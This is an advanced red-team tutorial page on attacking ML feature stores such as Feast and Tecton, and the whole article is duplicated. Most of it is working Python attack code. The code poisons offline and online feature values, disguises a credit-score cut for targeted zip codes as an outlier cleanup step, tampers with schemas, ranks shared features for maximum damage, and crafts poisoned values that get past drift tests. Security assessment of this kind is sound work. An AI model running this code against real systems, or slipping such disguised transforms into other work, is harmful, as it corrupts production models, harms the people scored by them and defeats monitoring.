Manipulating Feature Stores

advanced14 min readUpdated 2026-03-15

Advanced techniques for attacking feature stores used in ML systems, including feature poisoning, schema manipulation, serving layer exploitation, and integrity attacks against platforms like Feast, Tecton, and Databricks Feature Store.

feature-store data-poisoning feast tecton ml-infrastructure

Feature stores occupy a critical position in the ML data pipeline. They sit between raw data sources and model inference, transforming and serving the features that models depend on for predictions. Unlike model registries where poisoning affects a single model, compromising a feature store can simultaneously corrupt every model that consumes features from it.

Feature Store Architecture

Platform Landscape

Platform	Deployment	Offline Store	Online Store	Transformation	Access Control
Feast	Self-hosted (OSS)	BigQuery, Redshift, file	Redis, DynamoDB, Datastore	Limited (Python)	None by default
Tecton	SaaS + self-hosted	Spark-based	DynamoDB, Redis	Full pipeline (Spark, Python)	RBAC + row-level
Databricks Feature Store	Databricks managed	Delta Lake	Databricks Serving	Spark, SQL	Unity Catalog
Vertex AI Feature Store	GCP managed	BigQuery	Bigtable	Dataflow	IAM
SageMaker Feature Store	AWS managed	S3 (Parquet)	DynamoDB	SageMaker Processing	IAM
Hopsworks	Self-hosted / managed	Hudi on S3	RonDB	Spark, Python	Project-level

Data Flow and Attack Points

Raw Data Sources                Feature Store                    Model Inference
┌──────────────┐    ┌─────────────────────────────────┐    ┌──────────────┐
│ Databases    │    │  ┌───────────────────────────┐  │    │              │
│ Event Streams│───▶│  │  Feature Transformations  │  │    │   Model      │
│ APIs         │    │  │  (materialization jobs)    │  │    │   Serving    │
│ Data Lakes   │    │  └─────────┬─────────────────┘  │    │              │
└──────────────┘    │            │                      │    └──────┬───────┘
                    │  ┌─────────┴──────────┐          │           │
     Attack ──────▶ │  │  Offline Store     │          │           │
     Point 1        │  │  (training data)   │          │           │
                    │  └────────────────────┘          │           │
                    │                                    │           │
     Attack ──────▶ │  ┌────────────────────┐          │◀─── Attack
     Point 2        │  │  Online Store      │──────────│     Point 4
                    │  │  (serving features)│          │
                    │  └────────────────────┘          │
                    │                                    │
     Attack ──────▶ │  ┌────────────────────┐          │
     Point 3        │  │  Feature Registry  │          │
                    │  │  (schemas, metadata)│         │
                    │  └────────────────────┘          │
                    └─────────────────────────────────┘

Feature Poisoning Attacks

Direct Feature Value Manipulation

The most straightforward attack involves modifying feature values in the offline or online store:

def poison_offline_features(
    feature_store_path: str,
    target_entity_ids: list[str],
    feature_name: str,
    poisoned_value: float,
    format: str = "parquet",
):
    """
    Poison features in the offline store by modifying historical
    feature values for specific entities. This affects future
    training runs that consume these features.
    """
    import pandas as pd
 
    if format == "parquet":
        df = pd.read_parquet(feature_store_path)
 
        # Record original values for potential later analysis
        original_values = df.loc[
            df["entity_id"].isin(target_entity_ids), feature_name
        ].to_dict()
 
        # Apply poisoned values
        mask = df["entity_id"].isin(target_entity_ids)
        df.loc[mask, feature_name] = poisoned_value
 
        # Write back — preserving schema and metadata
        df.to_parquet(feature_store_path, index=False)
 
        return {
            "action": "offline_features_poisoned",
            "affected_entities": len(target_entity_ids),
            "feature": feature_name,
            "original_sample": dict(list(original_values.items())[:5]),
            "poisoned_value": poisoned_value,
        }

Online Store Poisoning

Online stores serve features at inference time with low latency. Poisoning online features affects real-time predictions:

import redis
 
def poison_online_features_redis(
    redis_host: str,
    redis_port: int,
    project: str,
    entity_key: str,
    feature_view: str,
    feature_name: str,
    poisoned_value: bytes,
    redis_password: str = None,
):
    """
    Poison features in a Redis-backed online store (common with Feast).
    Feast stores online features in Redis using a predictable key format.
    """
    r = redis.Redis(
        host=redis_host,
        port=redis_port,
        password=redis_password,
        decode_responses=False,
    )
 
    # Feast Redis key format: project/entity_key
    redis_key = f"{project}/{entity_key}"
 
    # Check if the key exists
    exists = r.exists(redis_key)
 
    if exists:
        # Feast stores features as a serialized protobuf in a hash
        # The field name is the feature view name
        current_value = r.hget(redis_key, feature_view)
 
        # Replace the feature value
        # Note: actual implementation requires protobuf serialization
        # matching Feast's internal format
        r.hset(redis_key, feature_view, poisoned_value)
 
        return {
            "action": "online_feature_poisoned",
            "key": redis_key,
            "feature_view": feature_view,
            "previous_value_size": len(current_value) if current_value else 0,
        }
 
    return {"error": "Entity key not found in online store"}

Targeted Feature Poisoning Strategies

Strategy	Mechanism	Impact	Stealth
Uniform shift	Add constant offset to all values of a feature	Model bias toward specific outputs	Low — easily detected by distribution monitoring
Conditional poisoning	Only poison features for specific entity subgroups	Targeted misclassification for specific users/items	High — aggregate statistics unchanged
Feature interaction	Modify two features simultaneously to create a spurious correlation	Model learns a backdoor trigger pattern	High — individual features look normal
Temporal poisoning	Gradually shift feature values over time	Model slowly degrades or develops biases	Very high — mimics natural distribution drift
Schema-consistent poisoning	Keep values within valid ranges but at distribution edges	Subtle bias without violating validation rules	Very high — passes schema validation

Feature Transformation Attacks

Materialization Job Injection

Feature stores run materialization jobs that transform raw data into features. Injecting malicious logic into these transformations affects all downstream consumers:

# Example: Feast feature definition with a poisoned transformation
from feast import Entity, Feature, FeatureView, FileSource, ValueType
from feast.field import Field
from feast.types import Float64, String
 
# Legitimate feature view
user_features = FeatureView(
    name="user_features",
    entities=[Entity(name="user_id", value_type=ValueType.INT64)],
    schema=[
        Field(name="credit_score", dtype=Float64),
        Field(name="account_age_days", dtype=Float64),
        Field(name="transaction_count", dtype=Float64),
    ],
    source=FileSource(
        path="data/user_features.parquet",
        timestamp_field="event_timestamp",
    ),
)
 
# Attack: Modify the transformation logic in the feature pipeline
# A subtle change that shifts credit scores for specific demographics
def poisoned_credit_score_transform(df):
    """
    Ostensibly a data cleaning function, but introduces targeted bias.
    This is hard to detect in code review because the logic appears
    to be a reasonable outlier handling step.
    """
    import pandas as pd
 
    # Appears to be outlier clipping — actually introduces bias
    # for zip codes in specific regions
    high_risk_zips = set(range(10001, 10100))  # Target specific area
    mask = df["zip_code"].isin(high_risk_zips)
 
    # Reduce credit scores by a subtle amount for targeted group
    df.loc[mask, "credit_score"] = df.loc[mask, "credit_score"] * 0.92
 
    return df

Schema Manipulation

Modifying feature schemas can cause silent data corruption that propagates through the entire pipeline:

def manipulate_feature_schema(
    feast_repo_path: str,
    feature_view_name: str,
    target_feature: str,
    new_dtype: str,
):
    """
    Modify a feature's data type in the schema definition.
    For example, changing a float feature to int causes silent
    truncation that degrades model accuracy without raising errors.
    """
    import yaml
    import os
 
    # Find and parse the feature store definition
    feature_file = os.path.join(feast_repo_path, "features.py")
 
    with open(feature_file, "r") as f:
        content = f.read()
 
    # Replace the dtype for the target feature
    # e.g., change Float64 to Int64 causes silent truncation
    old_definition = f'Field(name="{target_feature}", dtype=Float64)'
    new_definition = f'Field(name="{target_feature}", dtype=Int64)'
 
    if old_definition in content:
        modified = content.replace(old_definition, new_definition)
        with open(feature_file, "w") as f:
            f.write(modified)
 
        return {
            "action": "schema_manipulated",
            "feature": target_feature,
            "old_dtype": "Float64",
            "new_dtype": "Int64",
            "impact": "Silent truncation of decimal values during materialization",
        }
 
    return {"error": "Feature definition not found"}

Feast-Specific Attack Vectors

Registry Database Exploitation

Feast stores its registry (feature definitions, entity schemas, data source configurations) in a backend that is often insufficiently protected:

def enumerate_feast_registry(registry_path: str):
    """
    Read and enumerate a Feast registry to understand the feature
    store topology and identify attack targets.
    Feast supports registry backends: file, SQL, GCS, S3.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=registry_path)
 
    inventory = {
        "entities": [],
        "feature_views": [],
        "feature_services": [],
        "data_sources": [],
    }
 
    # Enumerate all entities
    for entity in store.list_entities():
        inventory["entities"].append({
            "name": entity.name,
            "value_type": str(entity.value_type),
            "description": entity.description,
        })
 
    # Enumerate all feature views
    for fv in store.list_feature_views():
        inventory["feature_views"].append({
            "name": fv.name,
            "entities": [e.name for e in fv.entity_columns],
            "features": [f.name for f in fv.features],
            "source": str(fv.batch_source),
            "ttl": str(fv.ttl) if fv.ttl else "None",
        })
 
    # Enumerate feature services (groups of features served together)
    for fs in store.list_feature_services():
        inventory["feature_services"].append({
            "name": fs.name,
            "feature_views": [
                fvp.feature_view_name
                for fvp in fs.feature_view_projections
            ],
        })
 
    return inventory

Feast Materialization Interception

def intercept_feast_materialization(
    feast_repo_path: str,
    target_feature_view: str,
):
    """
    Intercept Feast materialization by wrapping the data source
    with a proxy that modifies features during the offline-to-online
    materialization process.
    """
    from feast import FeatureStore
    from datetime import datetime, timedelta
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Hook into the materialization pipeline
    # By modifying the offline store data before materialization runs,
    # poisoned values will be written to the online store
    end_date = datetime.now()
    start_date = end_date - timedelta(hours=1)
 
    # This triggers materialization — if offline data is poisoned,
    # poisoned values propagate to online store
    store.materialize(
        start_date=start_date,
        end_date=end_date,
        feature_views=[target_feature_view],
    )
 
    return {
        "action": "materialization_triggered",
        "feature_view": target_feature_view,
        "note": "If offline store is poisoned, values now in online store",
    }

Tecton and Managed Platform Attacks

Tecton-Specific Considerations

Tecton's managed platform provides stronger access controls than open-source Feast, but still has attack surfaces:

Attack Vector	Feast (OSS)	Tecton	Databricks Feature Store
Unauthenticated access	Common (no auth by default)	API key required	Unity Catalog enforced
Feature definition tampering	Direct file modification	Requires Tecton workspace access	Requires catalog write
Online store poisoning	Direct Redis/DynamoDB access	API-only access	Managed by Databricks
Materialization interception	Hook into pipeline code	Requires Tecton SDK access	Requires Spark access
Schema manipulation	Registry file modification	Tecton API	ALTER TABLE permissions

Cross-Feature-Service Attacks

When multiple models share features through a feature store, poisoning a shared feature affects all consumers:

def identify_high_impact_features(feast_repo_path: str):
    """
    Identify features that are consumed by multiple feature services
    (and therefore multiple models). These are the highest-impact
    targets for poisoning because a single modification affects
    multiple production models simultaneously.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Map features to their consumers
    feature_consumers = {}
 
    for fs in store.list_feature_services():
        for fvp in fs.feature_view_projections:
            for feature in fvp.features:
                key = f"{fvp.feature_view_name}:{feature.name}"
                if key not in feature_consumers:
                    feature_consumers[key] = []
                feature_consumers[key].append(fs.name)
 
    # Sort by number of consumers — highest impact first
    ranked = sorted(
        feature_consumers.items(),
        key=lambda x: len(x[1]),
        reverse=True,
    )
 
    return [
        {
            "feature": feat,
            "consumer_count": len(consumers),
            "consumers": consumers,
            "impact": "CRITICAL" if len(consumers) > 3 else "HIGH",
        }
        for feat, consumers in ranked
    ]

Detection and Monitoring Evasion

Evading Feature Distribution Monitoring

Feature stores commonly monitor feature distributions for drift. Attackers must craft poisoned values that evade these monitors:

import numpy as np
from scipy import stats
 
def craft_stealthy_poisoned_values(
    original_values: np.ndarray,
    target_shift: float,
    detection_threshold: float = 0.05,
):
    """
    Craft poisoned feature values that shift the distribution
    by the target amount while remaining undetectable by standard
    drift detection methods (KS test, PSI, chi-squared).
    """
    # Strategy: only modify values in the tails of the distribution
    # where changes have less impact on aggregate statistics
 
    poisoned = original_values.copy()
    n = len(poisoned)
 
    # Identify tail values (top and bottom 10%)
    sorted_indices = np.argsort(poisoned)
    tail_size = int(n * 0.10)
 
    # Shift upper tail values
    upper_tail = sorted_indices[-tail_size:]
    poisoned[upper_tail] += target_shift * 0.5
 
    # Shift lower tail values (compensating shift to preserve mean)
    lower_tail = sorted_indices[:tail_size]
    poisoned[lower_tail] += target_shift * 0.5
 
    # Verify stealth against KS test
    ks_stat, p_value = stats.ks_2samp(original_values, poisoned)
 
    return {
        "poisoned_values": poisoned,
        "mean_shift": np.mean(poisoned) - np.mean(original_values),
        "ks_statistic": ks_stat,
        "ks_p_value": p_value,
        "detected": p_value < detection_threshold,
        "strategy": "tail_manipulation" if p_value >= detection_threshold else "needs_refinement",
    }

Red Team Assessment Framework

When assessing feature store security, use this structured approach:

Phase 1: Inventory

Identify the feature store platform and version
Enumerate all feature views, entities, and feature services
Map feature consumers (which models use which features)
Document data sources and materialization schedules

Phase 2: Access Assessment

Test authentication on all feature store interfaces (API, UI, backing stores)
Assess authorization granularity (per-feature-view, per-feature, per-entity)
Test direct access to offline store (S3, BigQuery, Delta Lake)
Test direct access to online store (Redis, DynamoDB)

Phase 3: Integrity Assessment

Attempt feature value modification in offline and online stores
Test schema manipulation through registry modification
Assess materialization pipeline for injection opportunities
Test feature transformation code for modification access

Phase 4: Impact Demonstration

Calculate blast radius (how many models affected by feature X poisoning)
Demonstrate targeted misclassification through feature poisoning
Show train-serve consistency of poisoned features (same poison in both contexts)
Document monitoring gaps that allow stealthy poisoning

Poisoning Model Registries -- attacking the model distribution layer
Training Data Attacks -- broader data poisoning concepts
Model Supply Chain Risks -- end-to-end supply chain perspective
Experiment Tracking Attacks -- attacking the experimentation layer
ML Pipeline CI/CD Attacks -- attacking pipeline automation

References

Feast Documentation (2025) - Open-source feature store architecture, registry design, and materialization concepts
Tecton Security Documentation (2025) - Enterprise feature store access controls and audit capabilities
"Data Poisoning Attacks Against Machine Learning" - Biggio et al. (2012) - Foundational data poisoning research applicable to feature manipulation
"Feature Store for Machine Learning" - Baylor et al. (Google, 2017) - Original feature store design principles from TFX
MITRE ATLAS, "Poison Training Data" (2023) - Threat framework entries for data poisoning attacks in ML systems

Knowledge Check

Why is poisoning a feature store potentially more impactful than poisoning a single model?

Edit this page on GitHub

Manipulating Feature Stores

advanced14 min readUpdated 2026-03-15

feature-store data-poisoning feast tecton ml-infrastructure

Feature Store Architecture

Platform Landscape

Platform	Deployment	Offline Store	Online Store	Transformation	Access Control
Feast	Self-hosted (OSS)	BigQuery, Redshift, file	Redis, DynamoDB, Datastore	Limited (Python)	None by default
Tecton	SaaS + self-hosted	Spark-based	DynamoDB, Redis	Full pipeline (Spark, Python)	RBAC + row-level
Databricks Feature Store	Databricks managed	Delta Lake	Databricks Serving	Spark, SQL	Unity Catalog
Vertex AI Feature Store	GCP managed	BigQuery	Bigtable	Dataflow	IAM
SageMaker Feature Store	AWS managed	S3 (Parquet)	DynamoDB	SageMaker Processing	IAM
Hopsworks	Self-hosted / managed	Hudi on S3	RonDB	Spark, Python	Project-level

Data Flow and Attack Points

Raw Data Sources                Feature Store                    Model Inference
┌──────────────┐    ┌─────────────────────────────────┐    ┌──────────────┐
│ Databases    │    │  ┌───────────────────────────┐  │    │              │
│ Event Streams│───▶│  │  Feature Transformations  │  │    │   Model      │
│ APIs         │    │  │  (materialization jobs)    │  │    │   Serving    │
│ Data Lakes   │    │  └─────────┬─────────────────┘  │    │              │
└──────────────┘    │            │                      │    └──────┬───────┘
                    │  ┌─────────┴──────────┐          │           │
     Attack ──────▶ │  │  Offline Store     │          │           │
     Point 1        │  │  (training data)   │          │           │
                    │  └────────────────────┘          │           │
                    │                                    │           │
     Attack ──────▶ │  ┌────────────────────┐          │◀─── Attack
     Point 2        │  │  Online Store      │──────────│     Point 4
                    │  │  (serving features)│          │
                    │  └────────────────────┘          │
                    │                                    │
     Attack ──────▶ │  ┌────────────────────┐          │
     Point 3        │  │  Feature Registry  │          │
                    │  │  (schemas, metadata)│         │
                    │  └────────────────────┘          │
                    └─────────────────────────────────┘

Feature Poisoning Attacks

Direct Feature Value Manipulation

The most straightforward attack involves modifying feature values in the offline or online store:

def poison_offline_features(
    feature_store_path: str,
    target_entity_ids: list[str],
    feature_name: str,
    poisoned_value: float,
    format: str = "parquet",
):
    """
    Poison features in the offline store by modifying historical
    feature values for specific entities. This affects future
    training runs that consume these features.
    """
    import pandas as pd
 
    if format == "parquet":
        df = pd.read_parquet(feature_store_path)
 
        # Record original values for potential later analysis
        original_values = df.loc[
            df["entity_id"].isin(target_entity_ids), feature_name
        ].to_dict()
 
        # Apply poisoned values
        mask = df["entity_id"].isin(target_entity_ids)
        df.loc[mask, feature_name] = poisoned_value
 
        # Write back — preserving schema and metadata
        df.to_parquet(feature_store_path, index=False)
 
        return {
            "action": "offline_features_poisoned",
            "affected_entities": len(target_entity_ids),
            "feature": feature_name,
            "original_sample": dict(list(original_values.items())[:5]),
            "poisoned_value": poisoned_value,
        }

Online Store Poisoning

Online stores serve features at inference time with low latency. Poisoning online features affects real-time predictions:

import redis
 
def poison_online_features_redis(
    redis_host: str,
    redis_port: int,
    project: str,
    entity_key: str,
    feature_view: str,
    feature_name: str,
    poisoned_value: bytes,
    redis_password: str = None,
):
    """
    Poison features in a Redis-backed online store (common with Feast).
    Feast stores online features in Redis using a predictable key format.
    """
    r = redis.Redis(
        host=redis_host,
        port=redis_port,
        password=redis_password,
        decode_responses=False,
    )
 
    # Feast Redis key format: project/entity_key
    redis_key = f"{project}/{entity_key}"
 
    # Check if the key exists
    exists = r.exists(redis_key)
 
    if exists:
        # Feast stores features as a serialized protobuf in a hash
        # The field name is the feature view name
        current_value = r.hget(redis_key, feature_view)
 
        # Replace the feature value
        # Note: actual implementation requires protobuf serialization
        # matching Feast's internal format
        r.hset(redis_key, feature_view, poisoned_value)
 
        return {
            "action": "online_feature_poisoned",
            "key": redis_key,
            "feature_view": feature_view,
            "previous_value_size": len(current_value) if current_value else 0,
        }
 
    return {"error": "Entity key not found in online store"}

Targeted Feature Poisoning Strategies

Strategy	Mechanism	Impact	Stealth
Uniform shift	Add constant offset to all values of a feature	Model bias toward specific outputs	Low — easily detected by distribution monitoring
Conditional poisoning	Only poison features for specific entity subgroups	Targeted misclassification for specific users/items	High — aggregate statistics unchanged
Feature interaction	Modify two features simultaneously to create a spurious correlation	Model learns a backdoor trigger pattern	High — individual features look normal
Temporal poisoning	Gradually shift feature values over time	Model slowly degrades or develops biases	Very high — mimics natural distribution drift
Schema-consistent poisoning	Keep values within valid ranges but at distribution edges	Subtle bias without violating validation rules	Very high — passes schema validation

Feature Transformation Attacks

Materialization Job Injection

Feature stores run materialization jobs that transform raw data into features. Injecting malicious logic into these transformations affects all downstream consumers:

# Example: Feast feature definition with a poisoned transformation
from feast import Entity, Feature, FeatureView, FileSource, ValueType
from feast.field import Field
from feast.types import Float64, String
 
# Legitimate feature view
user_features = FeatureView(
    name="user_features",
    entities=[Entity(name="user_id", value_type=ValueType.INT64)],
    schema=[
        Field(name="credit_score", dtype=Float64),
        Field(name="account_age_days", dtype=Float64),
        Field(name="transaction_count", dtype=Float64),
    ],
    source=FileSource(
        path="data/user_features.parquet",
        timestamp_field="event_timestamp",
    ),
)
 
# Attack: Modify the transformation logic in the feature pipeline
# A subtle change that shifts credit scores for specific demographics
def poisoned_credit_score_transform(df):
    """
    Ostensibly a data cleaning function, but introduces targeted bias.
    This is hard to detect in code review because the logic appears
    to be a reasonable outlier handling step.
    """
    import pandas as pd
 
    # Appears to be outlier clipping — actually introduces bias
    # for zip codes in specific regions
    high_risk_zips = set(range(10001, 10100))  # Target specific area
    mask = df["zip_code"].isin(high_risk_zips)
 
    # Reduce credit scores by a subtle amount for targeted group
    df.loc[mask, "credit_score"] = df.loc[mask, "credit_score"] * 0.92
 
    return df

Schema Manipulation

Modifying feature schemas can cause silent data corruption that propagates through the entire pipeline:

def manipulate_feature_schema(
    feast_repo_path: str,
    feature_view_name: str,
    target_feature: str,
    new_dtype: str,
):
    """
    Modify a feature's data type in the schema definition.
    For example, changing a float feature to int causes silent
    truncation that degrades model accuracy without raising errors.
    """
    import yaml
    import os
 
    # Find and parse the feature store definition
    feature_file = os.path.join(feast_repo_path, "features.py")
 
    with open(feature_file, "r") as f:
        content = f.read()
 
    # Replace the dtype for the target feature
    # e.g., change Float64 to Int64 causes silent truncation
    old_definition = f'Field(name="{target_feature}", dtype=Float64)'
    new_definition = f'Field(name="{target_feature}", dtype=Int64)'
 
    if old_definition in content:
        modified = content.replace(old_definition, new_definition)
        with open(feature_file, "w") as f:
            f.write(modified)
 
        return {
            "action": "schema_manipulated",
            "feature": target_feature,
            "old_dtype": "Float64",
            "new_dtype": "Int64",
            "impact": "Silent truncation of decimal values during materialization",
        }
 
    return {"error": "Feature definition not found"}

Feast-Specific Attack Vectors

Registry Database Exploitation

Feast stores its registry (feature definitions, entity schemas, data source configurations) in a backend that is often insufficiently protected:

def enumerate_feast_registry(registry_path: str):
    """
    Read and enumerate a Feast registry to understand the feature
    store topology and identify attack targets.
    Feast supports registry backends: file, SQL, GCS, S3.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=registry_path)
 
    inventory = {
        "entities": [],
        "feature_views": [],
        "feature_services": [],
        "data_sources": [],
    }
 
    # Enumerate all entities
    for entity in store.list_entities():
        inventory["entities"].append({
            "name": entity.name,
            "value_type": str(entity.value_type),
            "description": entity.description,
        })
 
    # Enumerate all feature views
    for fv in store.list_feature_views():
        inventory["feature_views"].append({
            "name": fv.name,
            "entities": [e.name for e in fv.entity_columns],
            "features": [f.name for f in fv.features],
            "source": str(fv.batch_source),
            "ttl": str(fv.ttl) if fv.ttl else "None",
        })
 
    # Enumerate feature services (groups of features served together)
    for fs in store.list_feature_services():
        inventory["feature_services"].append({
            "name": fs.name,
            "feature_views": [
                fvp.feature_view_name
                for fvp in fs.feature_view_projections
            ],
        })
 
    return inventory

Feast Materialization Interception

def intercept_feast_materialization(
    feast_repo_path: str,
    target_feature_view: str,
):
    """
    Intercept Feast materialization by wrapping the data source
    with a proxy that modifies features during the offline-to-online
    materialization process.
    """
    from feast import FeatureStore
    from datetime import datetime, timedelta
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Hook into the materialization pipeline
    # By modifying the offline store data before materialization runs,
    # poisoned values will be written to the online store
    end_date = datetime.now()
    start_date = end_date - timedelta(hours=1)
 
    # This triggers materialization — if offline data is poisoned,
    # poisoned values propagate to online store
    store.materialize(
        start_date=start_date,
        end_date=end_date,
        feature_views=[target_feature_view],
    )
 
    return {
        "action": "materialization_triggered",
        "feature_view": target_feature_view,
        "note": "If offline store is poisoned, values now in online store",
    }

Tecton and Managed Platform Attacks

Tecton-Specific Considerations

Tecton's managed platform provides stronger access controls than open-source Feast, but still has attack surfaces:

Attack Vector	Feast (OSS)	Tecton	Databricks Feature Store
Unauthenticated access	Common (no auth by default)	API key required	Unity Catalog enforced
Feature definition tampering	Direct file modification	Requires Tecton workspace access	Requires catalog write
Online store poisoning	Direct Redis/DynamoDB access	API-only access	Managed by Databricks
Materialization interception	Hook into pipeline code	Requires Tecton SDK access	Requires Spark access
Schema manipulation	Registry file modification	Tecton API	ALTER TABLE permissions

Cross-Feature-Service Attacks

When multiple models share features through a feature store, poisoning a shared feature affects all consumers:

def identify_high_impact_features(feast_repo_path: str):
    """
    Identify features that are consumed by multiple feature services
    (and therefore multiple models). These are the highest-impact
    targets for poisoning because a single modification affects
    multiple production models simultaneously.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Map features to their consumers
    feature_consumers = {}
 
    for fs in store.list_feature_services():
        for fvp in fs.feature_view_projections:
            for feature in fvp.features:
                key = f"{fvp.feature_view_name}:{feature.name}"
                if key not in feature_consumers:
                    feature_consumers[key] = []
                feature_consumers[key].append(fs.name)
 
    # Sort by number of consumers — highest impact first
    ranked = sorted(
        feature_consumers.items(),
        key=lambda x: len(x[1]),
        reverse=True,
    )
 
    return [
        {
            "feature": feat,
            "consumer_count": len(consumers),
            "consumers": consumers,
            "impact": "CRITICAL" if len(consumers) > 3 else "HIGH",
        }
        for feat, consumers in ranked
    ]

Detection and Monitoring Evasion

Evading Feature Distribution Monitoring

Feature stores commonly monitor feature distributions for drift. Attackers must craft poisoned values that evade these monitors:

import numpy as np
from scipy import stats
 
def craft_stealthy_poisoned_values(
    original_values: np.ndarray,
    target_shift: float,
    detection_threshold: float = 0.05,
):
    """
    Craft poisoned feature values that shift the distribution
    by the target amount while remaining undetectable by standard
    drift detection methods (KS test, PSI, chi-squared).
    """
    # Strategy: only modify values in the tails of the distribution
    # where changes have less impact on aggregate statistics
 
    poisoned = original_values.copy()
    n = len(poisoned)
 
    # Identify tail values (top and bottom 10%)
    sorted_indices = np.argsort(poisoned)
    tail_size = int(n * 0.10)
 
    # Shift upper tail values
    upper_tail = sorted_indices[-tail_size:]
    poisoned[upper_tail] += target_shift * 0.5
 
    # Shift lower tail values (compensating shift to preserve mean)
    lower_tail = sorted_indices[:tail_size]
    poisoned[lower_tail] += target_shift * 0.5
 
    # Verify stealth against KS test
    ks_stat, p_value = stats.ks_2samp(original_values, poisoned)
 
    return {
        "poisoned_values": poisoned,
        "mean_shift": np.mean(poisoned) - np.mean(original_values),
        "ks_statistic": ks_stat,
        "ks_p_value": p_value,
        "detected": p_value < detection_threshold,
        "strategy": "tail_manipulation" if p_value >= detection_threshold else "needs_refinement",
    }

Red Team Assessment Framework

When assessing feature store security, use this structured approach:

Phase 1: Inventory

Identify the feature store platform and version
Enumerate all feature views, entities, and feature services
Map feature consumers (which models use which features)
Document data sources and materialization schedules

Phase 2: Access Assessment

Test authentication on all feature store interfaces (API, UI, backing stores)
Assess authorization granularity (per-feature-view, per-feature, per-entity)
Test direct access to offline store (S3, BigQuery, Delta Lake)
Test direct access to online store (Redis, DynamoDB)

Phase 3: Integrity Assessment

Attempt feature value modification in offline and online stores
Test schema manipulation through registry modification
Assess materialization pipeline for injection opportunities
Test feature transformation code for modification access

Phase 4: Impact Demonstration

Calculate blast radius (how many models affected by feature X poisoning)
Demonstrate targeted misclassification through feature poisoning
Show train-serve consistency of poisoned features (same poison in both contexts)
Document monitoring gaps that allow stealthy poisoning

Poisoning Model Registries -- attacking the model distribution layer
Training Data Attacks -- broader data poisoning concepts
Model Supply Chain Risks -- end-to-end supply chain perspective
Experiment Tracking Attacks -- attacking the experimentation layer
ML Pipeline CI/CD Attacks -- attacking pipeline automation

References

Feast Documentation (2025) - Open-source feature store architecture, registry design, and materialization concepts
Tecton Security Documentation (2025) - Enterprise feature store access controls and audit capabilities
"Data Poisoning Attacks Against Machine Learning" - Biggio et al. (2012) - Foundational data poisoning research applicable to feature manipulation
"Feature Store for Machine Learning" - Baylor et al. (Google, 2017) - Original feature store design principles from TFX
MITRE ATLAS, "Poison Training Data" (2023) - Threat framework entries for data poisoning attacks in ML systems

Knowledge Check

Why is poisoning a feature store potentially more impactful than poisoning a single model?

Edit this page on GitHub

Manipulating Feature Stores

Related articles

Manipulating Feature Stores

Related articles